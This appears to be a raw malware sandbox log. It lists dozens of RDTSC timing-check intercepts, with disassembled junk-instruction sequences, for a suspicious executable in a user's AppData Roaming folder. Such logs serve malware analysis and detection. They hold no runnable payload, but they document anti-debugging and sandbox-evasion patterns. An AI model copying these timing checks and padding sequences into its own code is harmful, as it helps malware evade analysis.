Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 61B5C5 second address: 61B5F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push edi 0x00000007 pop edi 0x00000008 popad 0x00000009 jno 00007F95FD07A05Eh 0x0000000f jnp 00007F95FD07A058h 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b js 00007F95FD07A056h 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 61B5F0 second address: 61B5F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 61B5F7 second address: 61B611 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F95FD07A066h 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 61B743 second address: 61B749 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 61B749 second address: 61B757 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 ja 00007F95FD07A058h 0x0000000c push edx 0x0000000d pop edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 61B757 second address: 61B76F instructions: 0x00000000 rdtsc 0x00000002 jne 00007F95FD7D899Ch 0x00000008 jnc 00007F95FD7D8996h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 jg 00007F95FD7D8996h 0x00000018 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 61BA79 second address: 61BA91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F95FD07A064h 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 61BA91 second address: 61BA96 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 61C4B7 second address: 61C4BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 6200D8 second address: 62011D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F95FD7D89A0h 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F95FD7D89A2h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 jmp 00007F95FD7D899Dh 0x0000001a jmp 00007F95FD7D899Ah 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 62011D second address: 62012D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop edi 0x00000006 jp 00007F95FD07A05Eh 0x0000000c push eax 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 622AFF second address: 622B03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 6306F2 second address: 6306F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 6306F8 second address: 630719 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F95FD7D89A7h 0x0000000f rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 630719 second address: 630721 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 push edx 0x00000007 pop edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 640AF7 second address: 640B01 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F95FD7D8996h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 64087A second address: 640880 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 640880 second address: 640891 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pop eax 0x00000008 jne 00007F95FD7D89AAh 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 640891 second address: 64089C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 65A5BA second address: 65A5CF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95FD7D89A0h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 65A5CF second address: 65A5EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jmp 00007F95FD07A060h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 65A5EE second address: 65A5F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 65A5F2 second address: 65A614 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F95FD07A056h 0x00000008 jmp 00007F95FD07A068h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 65A614 second address: 65A619 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 6596E9 second address: 65970E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F95FD07A066h 0x00000009 jmp 00007F95FD07A05Bh 0x0000000e rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 65985C second address: 659860 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 659F06 second address: 659F0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 65A1C9 second address: 65A1CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 65A1CF second address: 65A1D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 65A1D3 second address: 65A1E4 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F95FD7D8996h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b push ebx 0x0000000c pushad 0x0000000d push eax 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 65BC83 second address: 65BC8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 65E524 second address: 65E52A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 65E52A second address: 65E530 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 65E530 second address: 65E534 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 65E876 second address: 65E8AB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95FD07A05Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F95FD07A05Dh 0x0000000e popad 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F95FD07A065h 0x00000017 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 65E8AB second address: 65E8B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007F95FD7D8996h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 661A8B second address: 661A9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jnp 00007F95FD07A056h 0x0000000f rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 6616A6 second address: 6616B3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jg 00007F95FD7D8996h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CF0EBF second address: 4CF0EF1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F95FD07A065h 0x00000009 xor ax, 50F6h 0x0000000e jmp 00007F95FD07A061h 0x00000013 popfd 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CF0EF1 second address: 4CF0F62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xchg eax, ebp 0x00000008 pushad 0x00000009 jmp 00007F95FD7D899Ah 0x0000000e movzx eax, di 0x00000011 popad 0x00000012 mov ebp, esp 0x00000014 pushad 0x00000015 jmp 00007F95FD7D89A3h 0x0000001a pushfd 0x0000001b jmp 00007F95FD7D89A8h 0x00000020 or eax, 155F03A8h 0x00000026 jmp 00007F95FD7D899Bh 0x0000002b popfd 0x0000002c popad 0x0000002d pop ebp 0x0000002e push eax 0x0000002f push edx 0x00000030 jmp 00007F95FD7D89A5h 0x00000035 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CF0F62 second address: 4CF0F68 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CF0F68 second address: 4CF0F6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CF0F6C second address: 4CF0F70 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CE0C46 second address: 4CE0C4C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CE0C4C second address: 4CE0C8D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95FD07A064h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b jmp 00007F95FD07A05Eh 0x00000010 mov ch, 1Ch 0x00000012 popad 0x00000013 push eax 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F95FD07A063h 0x0000001b rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CE0C8D second address: 4CE0C93 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CE0C93 second address: 4CE0C97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CE0C97 second address: 4CE0C9B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CE0C9B second address: 4CE0CC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F95FD07A069h 0x00000012 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CE0CC1 second address: 4CE0CC7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CE0CC7 second address: 4CE0CCD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CE0CCD second address: 4CE0CD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CE0CD1 second address: 4CE0D24 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a pushad 0x0000000b mov cx, 7427h 0x0000000f mov dx, si 0x00000012 popad 0x00000013 pop ebp 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 mov bx, 3596h 0x0000001b pushfd 0x0000001c jmp 00007F95FD07A067h 0x00000021 and cx, 021Eh 0x00000026 jmp 00007F95FD07A069h 0x0000002b popfd 0x0000002c popad 0x0000002d rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CE0D24 second address: 4CE0D34 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F95FD7D899Ch 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4D30014 second address: 4D3004B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95FD07A05Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F95FD07A066h 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F95FD07A05Eh 0x00000017 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4D3004B second address: 4D30072 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95FD7D899Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F95FD7D89A5h 0x00000011 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4D30072 second address: 4D30082 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F95FD07A05Ch 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4D30082 second address: 4D300B9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95FD7D899Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d pushad 0x0000000e call 00007F95FD7D89A4h 0x00000013 mov si, 1271h 0x00000017 pop esi 0x00000018 mov eax, edi 0x0000001a popad 0x0000001b pop ebp 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4D300B9 second address: 4D300CB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95FD07A05Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4D300CB second address: 4D300D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CC0111 second address: 4CC0117 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CC0117 second address: 4CC011B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CC0199 second address: 4CC01AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, ebx 0x00000005 push edx 0x00000006 pop ecx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CC01AA second address: 4CC01AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CC01AE second address: 4CC01C4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95FD07A062h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CE066B second address: 4CE067A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95FD7D899Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CE067A second address: 4CE0704 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, ax 0x00000006 mov eax, 5179AE57h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xchg eax, ebp 0x0000000f jmp 00007F95FD07A05Ah 0x00000014 push eax 0x00000015 pushad 0x00000016 call 00007F95FD07A061h 0x0000001b pushad 0x0000001c popad 0x0000001d pop esi 0x0000001e jmp 00007F95FD07A067h 0x00000023 popad 0x00000024 xchg eax, ebp 0x00000025 jmp 00007F95FD07A066h 0x0000002a mov ebp, esp 0x0000002c jmp 00007F95FD07A060h 0x00000031 pop ebp 0x00000032 push eax 0x00000033 push edx 0x00000034 jmp 00007F95FD07A067h 0x00000039 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CE0704 second address: 4CE070A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CE070A second address: 4CE070E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CE05A6 second address: 4CE05AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CE05AA second address: 4CE05C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95FD07A062h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CE05C0 second address: 4CE05D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F95FD7D899Eh 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CE05D2 second address: 4CE05D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CE02DF second address: 4CE02E4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CE02E4 second address: 4CE0305 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov bl, 5Eh 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F95FD07A065h 0x00000011 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CF01B9 second address: 4CF01DA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F95FD7D89A5h 0x00000011 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4D20F0B second address: 4D20F1D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F95FD07A05Eh 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4D20F1D second address: 4D20F4B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F95FD7D899Dh 0x00000011 jmp 00007F95FD7D899Bh 0x00000016 popfd 0x00000017 movzx eax, bx 0x0000001a popad 0x0000001b pop ebp 0x0000001c pushad 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4D002CC second address: 4D00300 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F95FD07A069h 0x00000008 jmp 00007F95FD07A05Bh 0x0000000d popfd 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov ch, EFh 0x00000012 popad 0x00000013 xchg eax, ebp 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4D00300 second address: 4D00304 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4D00304 second address: 4D00320 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95FD07A068h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4D00320 second address: 4D003A7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 68DF5A94h 0x00000008 mov ecx, ebx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov ebp, esp 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007F95FD7D89A5h 0x00000016 or ch, 00000006h 0x00000019 jmp 00007F95FD7D89A1h 0x0000001e popfd 0x0000001f popad 0x00000020 mov eax, dword ptr [ebp+08h] 0x00000023 pushad 0x00000024 jmp 00007F95FD7D89A8h 0x00000029 jmp 00007F95FD7D89A2h 0x0000002e popad 0x0000002f and dword ptr [eax], 00000000h 0x00000032 push eax 0x00000033 push edx 0x00000034 jmp 00007F95FD7D89A7h 0x00000039 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CE0443 second address: 4CE0460 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95FD07A069h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CE0460 second address: 4CE0470 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F95FD7D899Ch 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CE0470 second address: 4CE04D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F95FD07A069h 0x00000012 add ax, 5B56h 0x00000017 jmp 00007F95FD07A061h 0x0000001c popfd 0x0000001d pushfd 0x0000001e jmp 00007F95FD07A060h 0x00000023 or si, FD78h 0x00000028 jmp 00007F95FD07A05Bh 0x0000002d popfd 0x0000002e popad 0x0000002f rdtsc
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe RDTSC instruction interceptor: First address: 4CE04D0 second address: 4CE04D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
